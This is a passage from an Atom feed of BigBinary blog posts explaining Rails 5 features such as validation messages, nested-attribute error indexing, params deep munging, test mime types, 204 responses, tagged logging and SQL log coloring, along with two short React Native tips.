      <content type="html"><![CDATA[<p><a href="http://guides.rubyonrails.org/active_record_validations.html">Active Record</a>validations by default provides an error messages, based on applied attributes.But some time we need to display a custom error message while validating arecord.</p><p>We can give custom error message by passing <code>String</code> or <code>Proc</code> to <code>:message</code>.</p><pre><code class="language-ruby">class Book &lt; ActiveRecord::Base  # error message with a string  validates_presence_of :title, message: 'You must provide the title of book.'  # error message with a proc  validates_presence_of :price,      :message =&gt; Proc.new { |error, attributes|      &quot;#{attributes[:key]} cannot be blank.&quot;      }end</code></pre><h2>What's new in Rails 5 ?</h2><p>Rails 5<a href="https://github.com/rails/rails/pull/24119">allows passing record to error message generator.</a>Now we can pass current record object in a proc as an argument, so that we canwrite custom error message based on current object.</p><p>Revised example with current record object.</p><pre><code class="language-ruby">class Book &lt; ActiveRecord::Base  # error message with simple string  validates_presence_of :title, message: 'You must provide the title of book.'  # error message with proc using current record object  validates_presence_of :price,      :message =&gt; Proc.new { |book, data|      &quot;You must provide #{data[:attribute]} for #{book.title}&quot;      }end</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Platform specific styles in stylesheet, React Native]]></title>
       <author><name>Bilal Budhani</name></author>
      <link href="https://www.bigbinary.com/blog/apply-platform-specific-styles-in-stylesheet-react-native"/>
      <updated>2016-07-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/apply-platform-specific-styles-in-stylesheet-react-native</id>
      <content type="html"><![CDATA[<p>While writing cross platform applicationswe need to add platform specific styles.There are many ways of accomplishing this.</p><p>React Native<a href="https://github.com/facebook/react-native/pull/7033">introduced</a><code>Platform.select</code> helper in<a href="https://github.com/facebook/react-native/releases/tag/v0.28.0">version 0.28</a>which allows us to write platform specific styles in a concise way.In this blog we will see how to use this newly introduced feature.</p><h3>StyleSheet</h3><p>A basic stylesheet file might look something like this.</p><pre><code class="language-javascript">import { StyleSheet } from &quot;react-native&quot;;export default StyleSheet.create({  container: {    flex: 1,  },  containerIOS: {    padding: 4,    margin: 2,  },  containerAndroid: {    padding: 6,  },});</code></pre><p>Now let's see how we can re-write this StyleSheet using <code>Platform.select</code>.</p><pre><code class="language-javascript">import { StyleSheet, Platform } from &quot;react-native&quot;;export default StyleSheet.create({  container: {    flex: 1,    ...Platform.select({      ios: {        padding: 4,        margin: 2,      },      android: {        padding: 6,      },    }),  },});</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[User agent or custom header in React Native WebView]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/passing-user-agent-or-custom-header-in-react-native-webview"/>
      <updated>2016-07-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/passing-user-agent-or-custom-header-in-react-native-webview</id>
      <content type="html"><![CDATA[<p>Using <a href="https://facebook.github.io/react-native/docs/webview.html">WebView</a> in aReact Native application allows us to reuse already built web pages.</p><p>We have seen that in most of the &quot;web view&quot; based applications the links inheader are mostly turned in native navigational components. It means servershould not be sending header if React Native component is asking for web pages.However those headers should be present if the request is not coming from theReact Native app.</p><h2>Passing custom request headers</h2><p>We can configure React Native app to pass custom request headers when request ismade to the server to fetch pages.</p><pre><code class="language-javascript">let customHeaders = {  &quot;X-DemoApp-Version&quot;: &quot;1.1&quot;,  &quot;X-DemoApp-Type&quot;: &quot;demo-app-react-native&quot;,};</code></pre><p>While invoking WebView component we can pass <code>customHeaders</code> as shown below.</p><pre><code class="language-javascript">renderWebView() {  return (    &lt;WebView      source={ {uri: this.props.url, headers: customHeaders} }    /&gt;  )}</code></pre><h2>Passing user agent</h2><p>React Native also allows us to pass &quot;userAgent&quot; as a prop. However it is onlysupported by android version of React Native.</p><pre><code class="language-javascript">renderWebView() {  return (    &lt;WebView      source={ {uri: this.props.url} }      userAgent=&quot;demo-react-native-app&quot;    /&gt;  )}</code></pre><p>For iOS, we would need to add the following lines to our AppDelegate.m to setthe userAgent.</p><pre><code class="language-objectivec">NSString *newAgent = @&quot;demo-react-native-app&quot;;NSDictionary *dictionary = [[NSDictionary alloc] initWithObjectsAndKeys:newAgent, @&quot;UserAgent&quot;, nil];[[NSUserDefaults standardUserDefaults] registerDefaults:dictionary];</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Skip mailers while generating Rails 5 app]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/skip-mailers-while-generating-rails-5-app"/>
      <updated>2016-07-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/skip-mailers-while-generating-rails-5-app</id>
      <content type="html"><![CDATA[<p>We can now<a href="https://github.com/rails/rails/pull/18288">skip requiring Action Mailer</a> whilegenerating Rails 5 app.</p><pre><code class="language-bash">$ rails new my_app --skip-action-mailer# OR$ rails new my_app -M</code></pre><p>This comments out requiring <code>action_mailer/railtie</code> in <code>application.rb</code>.</p><p>It also omits mailer specific configurations such as<code>config.action_mailer.raise_delivery_errors</code> and<code>config.action_mailer.perform_caching</code> in <code>production/development</code> and<code>config.action_mailer.delivery_method</code> by default in <code>test</code> environment.</p><pre><code class="language-ruby"># application.rbrequire &quot;rails&quot;require &quot;active_model/railtie&quot;require &quot;active_job/railtie&quot;require &quot;active_record/railtie&quot;require &quot;action_controller/railtie&quot;# require &quot;action_mailer/railtie&quot;require &quot;action_view/railtie&quot;require &quot;action_cable/engine&quot;require &quot;sprockets/railtie&quot;require &quot;rails/test_unit/railtie&quot;</code></pre><p>As, we can see <code>action_mailer/railtie</code> is commented out.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Errors can be indexed with nested attributes in Rails 5]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/errors-can-be-indexed-with-nested-attrbutes-in-rails-5"/>
      <updated>2016-07-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/errors-can-be-indexed-with-nested-attrbutes-in-rails-5</id>
      <content type="html"><![CDATA[<p>We use <code>accepts_nested_attributes_for</code> when we want a single form to cater tomultiple models. By using this we can easily provide attributes for associatedmodels.</p><p>In Rails 4.x, if a validation fails for one or more of the associated models,then it is not possible to figure out from error message, which of theassociated model object is the error related to.</p><pre><code class="language-ruby">class Product &lt; ApplicationRecordhas_many :variantsaccepts_nested_attributes_for :variantsendclass Variant &lt; ApplicationRecordvalidates :display_name, :price, presence: trueend&gt; &gt; product = Product.new(name: 'Table')&gt; &gt; variant1 = Variant.new(price: 10)&gt; &gt; variant2 = Variant.new(display_name: 'Brown')&gt; &gt; product.variants = [variant1, variant2]&gt; &gt; product.save&gt; &gt; =&gt; false&gt; &gt; product.error.messages&gt; &gt; =&gt; {:&quot;variants.display_name&quot;=&gt;[&quot;can't be blank&quot;], :&quot;variants.price&quot;=&gt;[&quot;can't be blank&quot;]}</code></pre><p>In the example above we can see that if this error message is sent as JSON API,we cannot find out which variant save failed because of which attribute.</p><p>This works well when we render forms using Active Record models, as errors areavailable on individual instances. 
But, the issue arises with an API call, wherewe don't have access to these instances.</p><h2>Rails 5 allows indexing of errors on nested attributes</h2><p>In Rails 5, we can <a href="https://github.com/rails/rails/pull/19686">add an index</a> toerrors on nested models.</p><p>We can add the option <code>index_errors: true</code> to <code>has_many</code> association to enablethis behavior on individual association.</p><pre><code class="language-ruby">class Product &lt; ApplicationRecordhas_many :variants, index_errors: trueaccepts_nested_attributes_for :variantsendclass Variant &lt; ApplicationRecordvalidates :display_name, :price, presence: trueend&gt; &gt; product = Product.new(name: 'Table')&gt; &gt; variant1 = Variant.new(price: 10)&gt; &gt; variant2 = Variant.new(display_name: 'Brown')&gt; &gt; product.variants = [variant1, variant2]&gt; &gt; product.save&gt; &gt; =&gt; false&gt; &gt; product.error.messages&gt; &gt; =&gt; {:&quot;variants[0].display_name&quot;=&gt;[&quot;can't be blank&quot;], :&quot;variants[1].price&quot;=&gt;[&quot;can't be blank&quot;]}</code></pre><h2>Using global configuration</h2><p>In order to make this change global, we can set configuration<code>config.active_record.index_nested_attribute_errors = true</code> which is <code>false</code> bydefault.</p><pre><code class="language-ruby">config.active_record.index_nested_attribute_errors = trueclass Product &lt; ApplicationRecordhas_many :variantsaccepts_nested_attributes_for :variantsendclass Variant &lt; ApplicationRecordvalidates :display_name, :price, presence: trueend</code></pre><p>This will work exactly same as an example with<code>has_many :variants, index_errors: true</code> in <code>Product</code>.</p>]]></content>
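<![CDATA[
The difference `index_errors` makes is purely in the shape of the error keys. The helper below is hypothetical, a plain-Ruby sketch of how a key for a nested error would be built with and without a positional index.

```ruby
# Sketch: build a nested error key. Without an index we get the ambiguous
# Rails 4.x form ("variants.price"); with one, the indexed Rails 5 form
# ("variants[1].price").
def nested_error_key(association, attribute, index: nil)
  if index.nil?
    "#{association}.#{attribute}"
  else
    "#{association}[#{index}].#{attribute}"
  end
end
```

A JSON API consumer receiving `variants[1].price` can map the error straight back to the second variant in the submitted payload, which is exactly what the unindexed form could not support.
]]>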
    </entry><entry>
       <title><![CDATA[Rails 5 Conversion when deep munging params]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-does-not-convert-blank-array-to-nil-in-deep-munging"/>
      <updated>2016-07-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-does-not-convert-blank-array-to-nil-in-deep-munging</id>
      <content type="html"><![CDATA[<p>In older Rails version (&lt; 3.2), when an empty array was passed to a <code>where</code>clause or to a <code>find_by</code> query, it generated SQL with an <code>IS NULL</code> clause.</p><pre><code class="language-ruby">User.find_by_email([]).to_sql#=&gt; &quot;SELECT * FROM users WHERE email IS NULL&quot;User.find_by_email([nil]).to_sql#=&gt; &quot;SELECT * FROM users WHERE email IS NULL&quot;</code></pre><p>Also, when JSON data of the request was parsed and <code>params</code> got generated thedeep munging converted empty arrays to <code>nil</code>.</p><p>For example, When the following JSON data is posted to a Rails controller</p><pre><code class="language-javascript">{&quot;property_grouping&quot;:{&quot;project_id&quot;:289,&quot;name&quot;:&quot;test group2&quot;,&quot;property_ids&quot;:[]}}</code></pre><p>It gets converted into the following params in the controller.</p><pre><code class="language-javascript">{&quot;property_grouping&quot;=&gt;{&quot;project_id&quot;=&gt;289, &quot;name&quot;=&gt;&quot;test group2&quot;, &quot;property_ids&quot;=&gt;nil, },&quot;action&quot;=&gt;&quot;...&quot;, &quot;controller&quot;=&gt;&quot;...&quot;, &quot;format&quot;=&gt;&quot;json&quot;}</code></pre><p>This in combination with the fact that Active Record constructs <code>IS NULL</code> querywhen blank array is passed became one of the security threats and<a href="https://github.com/rails/rails/issues/13420">one of the most complained issues in Rails</a>.</p><p>The security threat we had was that it was possible for an attacker to issueunexpected database queries with &quot;IS NULL&quot; where clauses. 
Though there was nothreat of an insert being carried out, there could be scope for firing queriesthat would check for NULL even if it wasn't intended.</p><p>In later version of Rails(&gt; 3.2), we had a different way of handling blankarrays in Active Record <code>find_by</code> and <code>where</code> clauses.</p><pre><code class="language-ruby">User.find_by_email([]).to_sql#=&gt; &quot;SELECT &quot;users&quot;.* FROM &quot;users&quot; WHERE 1=0 LIMIT 1&quot;User.find_by_email([nil]).to_sql#=&gt; &quot;SELECT * FROM users WHERE email IS NULL&quot;</code></pre><p>As you can see a conditional for empty array doesn't trigger <code>IS NULL</code> query,which solved part of the problem.</p><p>We still had conversion of empty array to <code>nil</code> in the deep munging in place andhence there was still a threat of undesired behavior when request containedempty array.</p><p>One way to handle it was to add <code>before_action</code> hooks to the action that couldmodify the value to empty array if it were <code>nil</code>.</p><p>In Rails 5,<a href="https://github.com/rails/rails/pull/16924">empty array does not get converted to nil</a>in deep munging. With this change, the empty array will persist as is fromrequest to the <code>params</code> in the controller.</p>]]></content>
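<![CDATA[
The pre-Rails-5 behavior is easy to see in isolation. Below is a simplified, Rails-free sketch of the old deep munging (the real implementation handles a few more cases, such as nils inside arrays); it walks the params structure and turns every empty array into `nil`, which is precisely the conversion Rails 5 removed.

```ruby
# Simplified sketch of pre-Rails-5 deep munging: empty arrays anywhere in
# the params structure become nil.
def deep_munge_pre_rails5(value)
  case value
  when Array
    value.empty? ? nil : value.map { |v| deep_munge_pre_rails5(v) }
  when Hash
    value.each { |k, v| value[k] = deep_munge_pre_rails5(v) }
  else
    value
  end
end
```

Running it over the example payload turns `"property_ids" => []` into `"property_ids" => nil`, which is the value the controller used to receive and the source of the unintended `IS NULL` queries.
]]>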
    </entry><entry>
       <title><![CDATA[Specific mime types in controller tests in Rails 5]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/use-as-option-to-encode-request-with-specific-mime-type-in-rails-5"/>
      <updated>2016-07-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/use-as-option-to-encode-request-with-specific-mime-type-in-rails-5</id>
      <content type="html"><![CDATA[<p>Before Rails 5, while sending requests with integration test setup, we needed toadd <code>format</code> option to send request with different <code>Mime type</code>.</p><pre><code class="language-ruby">class ProductsControllerTest &lt; ActionController::TestCase  def test_create    post :create, { product: { name: 'Rails 5 book' } }.to_json,        format: :json,        headers: { 'Content-Type' =&gt; 'application/json' }    assert_equal 'application/json', request.content_type    assert_equal({ id: 1, name: 'Rails 5 book' }, JSON.parse(response.body))  endend</code></pre><p>This format for writing tests with <code>JSON</code> type is lengthy and needs too muchinformation to be passed to request as well.</p><h2>Improvement with Rails 5</h2><p>In Rails 5, we can provide <code>Mime type</code> while sending request by<a href="https://github.com/rails/rails/pull/21671">passing it with as option</a> and allthe other information like <code>headers</code> and format will be passed automatically.</p><pre><code class="language-ruby">class ProductsControllerTest &lt; ActionDispatch::IntegrationTest  def test_create    post products_url, params: { product: { name: 'Rails 5 book' } }, as: :json    assert_equal 'application/json', request.content_type    assert_equal({ 'id' =&gt; 1, 'name' =&gt; 'Rails 5 book' }, response.parsed_body)  endend</code></pre><p>As we can notice, we don't need to parse JSON anymore.</p><p>With changes in this <a href="https://github.com/rails/rails/pull/23597">PR</a>, we canfetch parsed response without needing to call <code>JSON.parse</code> at all.</p><h2>Custom Mime Type</h2><p>We can also register our own encoders for any registered <code>Mime Type</code>.</p><pre><code class="language-ruby">class ProductsControllerTest &lt; ActionDispatch::IntegrationTest  def setup    Mime::Type.register 'text/custom', :custom    ActionDispatch::IntegrationTest.register_encoder :custom,      param_encoder: -&gt; params { 
params.to_custom },      response_parser: -&gt; body { body }  end  def test_index    get products_url, params: { name: 'Rails 5 book' }, as: :custom    assert_response :success    assert_equal 'text/custom', request.content_type  endend</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Default response with 204 No Content in Rails 5]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/controller-actions-default-no-content-in-rails-5-if-template-is-missing"/>
      <updated>2016-07-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/controller-actions-default-no-content-in-rails-5-if-template-is-missing</id>
      <content type="html"><![CDATA[<p>Before Rails 5, when we forget to add template for an action, we get<code>ActionView::MissingTemplate</code> exception.</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController  def index    @users = User.all  endendStarted GET &quot;/users&quot; for ::1 at 2016-06-10 17:10:40 +0530Processing by UsersController#index as HTMLCompleted 500 Internal Server Error in 5msActionView::MissingTemplate (Missing template users/index, application/index with {:locale=&gt;[:en], :formats=&gt;[:html], :variants=&gt;[], :handlers=&gt;[:erb, :builder, :raw, :ruby]}...</code></pre><p>Similarly, if we don't specify response for a POST request, we will also get<code>ActionView::MissingTemplate</code> exception.</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController  def create    @user = User.new(user_params)    @user.save  endend</code></pre><pre><code class="language-plaintext">Started POST &quot;/users&quot;Processing by UsersController#create as HTML  Parameters: {&quot;utf8&quot;=&gt;&quot;&quot;, &quot;user&quot;=&gt;{&quot;name&quot;=&gt;&quot;Max&quot;}, &quot;commit&quot;=&gt;&quot;Create User&quot;}   (0.1ms)  begin transaction  SQL (2.7ms)  INSERT INTO &quot;users&quot; (&quot;name&quot;, &quot;created_at&quot;, &quot;updated_at&quot;) VALUES (?, ?, ?)  
[[&quot;name&quot;, &quot;Max&quot;], [&quot;created_at&quot;, 2016-06-10 12:29:09 UTC], [&quot;updated_at&quot;, 2016-06-10 12:29:09 UTC]]   (0.5ms)  commit transactionCompleted 500 Internal Server Error in 5msActionView::MissingTemplate (Missing template users/create, application/create with {:locale=&gt;[:en], :formats=&gt;[:html], :variants=&gt;[], :handlers=&gt;[:erb, :builder, :raw, :ruby]}...</code></pre><p>In Rails 5,<a href="https://github.com/rails/rails/pull/19377">if we don't specify response for an action then Rails returns <code>204: No content</code> response by default</a>.This change can cause some serious implications during the development phase ofthe app.</p><p>Let's see what happens with the POST request without specifying the response.</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController  def create    @user = User.new(user_params)    @user.save  endend</code></pre><pre><code class="language-plaintext">Started POST &quot;/users&quot;Processing by UsersController#create as HTML  Parameters: {&quot;utf8&quot;=&gt;&quot;&quot;, &quot;user&quot;=&gt;{&quot;name&quot;=&gt;&quot;Max&quot;}, &quot;commit&quot;=&gt;&quot;Create User&quot;}   (0.1ms)  begin transaction  SQL (2.7ms)  INSERT INTO &quot;users&quot; (&quot;name&quot;, &quot;created_at&quot;, &quot;updated_at&quot;) VALUES (?, ?, ?)  [[&quot;name&quot;, &quot;Max&quot;], [&quot;created_at&quot;, 2016-06-10 12:29:09 UTC], [&quot;updated_at&quot;, 2016-06-10 12:29:09 UTC]]   (0.5ms)  commit transactionNo template found for UsersController#create, rendering head :no_contentCompleted 204 No Content in 41ms (ActiveRecord: 3.3ms)</code></pre><p>Rails happily returns with <code>204: No content</code> response in this case.</p><p>This means users get the feel that nothing happened in the browser. BecauseRails returned with no content and browser happily accepted it. 
But in reality,the user record was created in the database.</p><p>Let's see what happens with the GET request in Rails 5.</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController  def index    @users = User.all  endend</code></pre><pre><code class="language-plaintext">ActionController::UnknownFormat (UsersController#index is missing a template for this request format and variant.request.formats: [&quot;text/html&quot;]request.variant: []NOTE! For XHR/Ajax or API requests, this action would normally respond with 204 No Content: an empty white screen. Since you're loading it in a web browser, we assume that you expected to actually render a template, not nothing, so we're showing an error to be extra-clear. If you expect 204 No Content, carry on. That's what you'll get from an XHR or API request. Give it a shot.):</code></pre><p>Instead of <code>204: No Content</code>, we get<a href="https://github.com/rails/rails/pull/23827"><code>ActionController::UnknownFormat</code> exception</a>.Rails is being extra smart here and hinting that we are probably missingcorresponding template for this controller action. It is smart enough to show usthis message as we requested this page via browser via a GET request. But if thesame request is made via Ajax or through an API call or a POST request, Railswill return <code>204: No Content</code> response as seen before.</p><p>In general, this change can trip us in the development phase, as we are used toincremental steps like adding a route, then the controller action and then thetemplate or response. Getting 204 response can give a feel of nothing happeningwhere things have actually happened in the background. So don't forget torespond properly from your controller actions.</p>]]></content>
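<![CDATA[
The branching described above can be summarized in a tiny decision function. This is an illustrative model of the behavior, not Rails' actual implementation: when an action renders nothing and no template exists, a browser-originated GET gets the explanatory error, while everything else gets `204 No Content`.

```ruby
# Illustrative model: what Rails 5 does when an action renders nothing and
# no template is found.
def implicit_response(browser_get:)
  browser_get ? :unknown_format_error : 204
end
```

So an XHR, API call, or POST falls through to `204`, while loading the page in a browser surfaces the `ActionController::UnknownFormat` hint instead.
]]>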
    </entry><entry>
       <title><![CDATA[Rails 5 ensures compatibility with Rack frameworks]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-ensures-compatibility-between-action-dispatch-session-and-rack-session"/>
      <updated>2016-06-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-ensures-compatibility-between-action-dispatch-session-and-rack-session</id>
      <content type="html"><![CDATA[<p>Before Rails 5, <a href="https://github.com/rails/rails/issues/15843">there were errors in running integration tests</a> when Rack frameworks like <code>Sinatra</code>, <code>Grape</code>, etc. were mounted within Rails with the aim of using its session.</p><p>Problems were reported in many places, including <a href="https://gist.github.com/toolmantim/9597022">GitHub gists</a> and <a href="http://stackoverflow.com/questions/22439361/rspec-testing-api-with-rack-protection">Stack Overflow</a>, regarding an error of the following form.</p><pre><code class="language-plaintext">NoMethodError (undefined method `each' for #&lt;ActionDispatch::Request::Session:0x7fb8dbe7f838 not yet loaded&gt;):
 rack (1.5.2) lib/rack/session/abstract/id.rb:158:in `stringify_keys'
 rack (1.5.2) lib/rack/session/abstract/id.rb:95:in `update'
 rack (1.5.2) lib/rack/session/abstract/id.rb:258:in `prepare_session'
 rack (1.5.2) lib/rack/session/abstract/id.rb:224:in `context'
 rack (1.5.2) lib/rack/session/abstract/id.rb:220:in `call'</code></pre><p>As we can see, the error occurs due to the absence of the method <code>each</code> on an <code>ActionDispatch::Request::Session</code> object.</p><p>In Rails 5, the <code>each</code> method <a href="https://github.com/rails/rails/pull/24820">was introduced to the ActionDispatch::Request::Session</a> class, making it compatible with Rack frameworks mounted in Rails and hence avoiding the above-mentioned errors in integration testing.</p>]]></content>
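The fix boils down to duck typing: the session object needs an each method so Rack middleware can iterate it like a Hash (that is what stringify_keys does internally). A minimal plain-Ruby sketch, where SessionWrapper is a hypothetical stand-in for ActionDispatch::Request::Session:

```ruby
# Hypothetical session object; adding #each (plus Enumerable) lets any code
# that iterates key/value pairs treat it like a Hash.
class SessionWrapper
  include Enumerable

  def initialize(store = {})
    @store = store
  end

  def [](key)
    @store[key]
  end

  def []=(key, value)
    @store[key] = value
  end

  # The Rails 5 change in spirit: expose iteration over the underlying store
  def each
    @store.each { |key, value| yield key, value }
  end
end

session = SessionWrapper.new("user_id" => 42)
session.to_a  # Enumerable now works: yields the key/value pairs
```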
    </entry><entry>
       <title><![CDATA[Rails 5 supports logging errors with tagged logging]]></title>
       <author><name>Sharang Dashputre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-supports-logging-errors-with-tagged-logging"/>
      <updated>2016-06-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-supports-logging-errors-with-tagged-logging</id>
      <content type="html"><![CDATA[<p>We use <a href="http://guides.rubyonrails.org/debugging_rails_applications.html#tagged-logging">tagged logging</a> to better extract information from logs generated by Rails applications.</p><p>Consider a Rails 4.x application where the request id is used as a log tag by adding the following to <code>config/environments/production.rb</code>.</p><pre><code class="language-ruby">config.log_tags = [:uuid]</code></pre><p>The log generated for that application would look like:</p><pre><code class="language-ruby">[df88dbaa-50fd-4178-85d7-d66279ea33b6] Started GET &quot;/posts&quot; for ::1 at 2016-06-03 17:19:32 +0530
[df88dbaa-50fd-4178-85d7-d66279ea33b6] Processing by PostsController#index as HTML
[df88dbaa-50fd-4178-85d7-d66279ea33b6]   Post Load (0.2ms)  SELECT &quot;posts&quot;.* FROM &quot;posts&quot;
[df88dbaa-50fd-4178-85d7-d66279ea33b6]   Rendered posts/index.html.erb within layouts/application (4.8ms)
[df88dbaa-50fd-4178-85d7-d66279ea33b6] Completed 500 Internal Server Error in 10ms (ActiveRecord: 0.2ms)
[df88dbaa-50fd-4178-85d7-d66279ea33b6]

ActionView::Template::Error (divided by 0):
    29: &lt;br&gt;
    30:
    31: &lt;%= link_to 'New Post', new_post_path %&gt;
    32: &lt;%= 1/0 %&gt;
  app/views/posts/index.html.erb:32:in `/'
  app/views/posts/index.html.erb:32:in `_app_views_posts_index_html_erb___110320845380431566_70214104632140'</code></pre><p>As we can see, the request id tag is not prepended to the lines containing error details. If we search the log file by the request id, the error details would not be shown.</p><p>In Rails 5, <a href="https://github.com/rails/rails/pull/23203">errors in logs show log tags as well</a>, overcoming the problem we saw above.</p><p>Please note that the log tag name for the request id has changed in Rails 5.
The setting would thus look as shown below.</p><pre><code class="language-ruby">config.log_tags = [:request_id]</code></pre><p>This is how the same log will look in a Rails 5 application.</p><pre><code class="language-ruby">[7efb4d18-8e55-4d51-b31e-119f49f5a410] Started GET &quot;/&quot; for ::1 at 2016-06-03 17:24:59 +0530
[7efb4d18-8e55-4d51-b31e-119f49f5a410] Processing by PostsController#index as HTML
[7efb4d18-8e55-4d51-b31e-119f49f5a410]   Rendering posts/index.html.erb within layouts/application
[7efb4d18-8e55-4d51-b31e-119f49f5a410]   Post Load (0.9ms)  SELECT &quot;posts&quot;.* FROM &quot;posts&quot;
[7efb4d18-8e55-4d51-b31e-119f49f5a410]   Rendered posts/index.html.erb within layouts/application (13.2ms)
[7efb4d18-8e55-4d51-b31e-119f49f5a410] Completed 500 Internal Server Error in 30ms (ActiveRecord: 0.9ms)
[7efb4d18-8e55-4d51-b31e-119f49f5a410]
[7efb4d18-8e55-4d51-b31e-119f49f5a410] ActionView::Template::Error (divided by 0):
[7efb4d18-8e55-4d51-b31e-119f49f5a410]     29: &lt;br&gt;
[7efb4d18-8e55-4d51-b31e-119f49f5a410]     30:
[7efb4d18-8e55-4d51-b31e-119f49f5a410]     31: &lt;%= link_to 'New Post', new_post_path %&gt;
[7efb4d18-8e55-4d51-b31e-119f49f5a410]     32: &lt;%= 1/0 %&gt;
[7efb4d18-8e55-4d51-b31e-119f49f5a410]
[7efb4d18-8e55-4d51-b31e-119f49f5a410] app/views/posts/index.html.erb:32:in `/'
[7efb4d18-8e55-4d51-b31e-119f49f5a410] app/views/posts/index.html.erb:32:in `_app_views_posts_index_html_erb___1136362343261984150_70232665530320'</code></pre>]]></content>
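The essence of the change is that every physical line of output, including multi-line error backtraces, gets the tag prefix. A minimal sketch with the stdlib Logger (ActiveSupport::TaggedLogging does this properly in real Rails apps); the formatter below is a hypothetical simplification:

```ruby
require "logger"
require "stringio"

io = StringIO.new
logger = Logger.new(io)
request_id = "7efb4d18-8e55-4d51-b31e-119f49f5a410"

# Tag every physical line of each message, so grepping the log by request id
# also finds the error backtrace lines.
logger.formatter = proc do |_severity, _time, _progname, msg|
  msg.to_s.lines.map { |line| "[#{request_id}] #{line.chomp}\n" }.join
end

logger.error("ActionView::Template::Error (divided by 0):\n" \
             "  app/views/posts/index.html.erb:32:in `/'")
puts io.string
```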
    </entry><entry>
       <title><![CDATA[Rails 5 makes sql statements even more colorful]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-makes-sql-statements-even-more-colorful"/>
      <updated>2016-06-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-makes-sql-statements-even-more-colorful</id>
      <content type="html"><![CDATA[<p>In Rails 5, SQL statements have a <a href="https://github.com/rails/rails/pull/20607">much more granular level of coloration</a>.</p><h3>INSERT statement</h3><p>Font color for the <code>INSERT</code> command is green.</p><p><img src="/blog_images/2016/rails-5-makes-sql-statements-even-more-colorful/insert-coloration.png" alt="insert statement in green color"></p><h3>UPDATE and SELECT statements</h3><p>Font color for the <code>UPDATE</code> command is yellow, and for <code>SELECT</code> it is blue.</p><p><img src="/blog_images/2016/rails-5-makes-sql-statements-even-more-colorful/update-coloration.png" alt="update statement in yellow color"></p><h3>DELETE statement</h3><p>Font color for the <code>DELETE</code> command is red.</p><p><img src="/blog_images/2016/rails-5-makes-sql-statements-even-more-colorful/delete-coloration.png" alt="delete statement in red color"></p><p>As you might have noticed above, the font color for <code>transaction</code> is cyan.</p><h3>Rollback statement</h3><p>Font color for <code>Rollback transaction</code> is red.</p><p><img src="/blog_images/2016/rails-5-makes-sql-statements-even-more-colorful/rollback-coloration.png" alt="rollback statement in red color"></p><h3>Other statements</h3><p>For <a href="https://github.com/rails/rails/pull/20921">custom SQL statements the color</a> is magenta, and the Model Load/exists color is cyan.</p><p><img src="/blog_images/2016/rails-5-makes-sql-statements-even-more-colorful/misc-coloration.png" alt="magenta"></p>]]></content>
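The scheme described above can be sketched as a lookup from the leading SQL keyword to an ANSI color code. This is a hypothetical simplification of what Rails' log subscriber does, not its actual implementation:

```ruby
# ANSI foreground color codes matching the scheme in the post:
# green INSERT, yellow UPDATE, blue SELECT, red DELETE/ROLLBACK,
# cyan transactions, magenta for anything else.
SQL_COLORS = {
  "INSERT"   => 32,
  "UPDATE"   => 33,
  "SELECT"   => 34,
  "DELETE"   => 31,
  "ROLLBACK" => 31,
  "BEGIN"    => 36,
  "COMMIT"   => 36
}.freeze

def colorize_sql(sql)
  keyword = sql.strip.split.first.to_s.upcase
  code = SQL_COLORS.fetch(keyword, 35) # magenta for custom statements
  "\e[#{code}m#{sql}\e[0m"
end

puts colorize_sql("INSERT INTO posts (title) VALUES ('Hi')") # green in a terminal
puts colorize_sql("EXPLAIN SELECT 1")                        # magenta (custom)
```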
    </entry><entry>
       <title><![CDATA[Rails 5 adds helpers method in controllers for ease]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-add-helpers-method-to-ease-usage-of-helper-modules-in-controllers"/>
      <updated>2016-06-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-add-helpers-method-to-ease-usage-of-helper-modules-in-controllers</id>
      <content type="html"><![CDATA[<p>Before Rails 5, when we wanted to use any of the helper methods in controllers, we used to do the following.</p><pre><code class="language-ruby">module UsersHelper
  def full_name(user)
    user.first_name + user.last_name
  end
end

class UsersController &lt; ApplicationController
  include UsersHelper

  def update
    @user = User.find params[:id]
    if @user.update_attributes(user_params)
      redirect_to user_path(@user), notice: &quot;#{full_name(@user)} is successfully updated&quot;
    else
      render :edit
    end
  end
end</code></pre><p>Though this works, it adds all public methods of the included helper module to the controller.</p><p>This can lead to some of the methods in the helper module conflicting with the methods in controllers.</p><p>Also, if our helper module depends on other helpers, then we need to include all of those dependencies in our controller as well, otherwise it won't work.</p><h2>New way to call helper methods in Rails 5</h2><p>In Rails 5, by using <a href="https://github.com/rails/rails/pull/24866">the new instance-level helpers method</a> in the controller, we can access helper methods in controllers.</p><pre><code class="language-ruby">module UsersHelper
  def full_name(user)
    user.first_name + user.last_name
  end
end

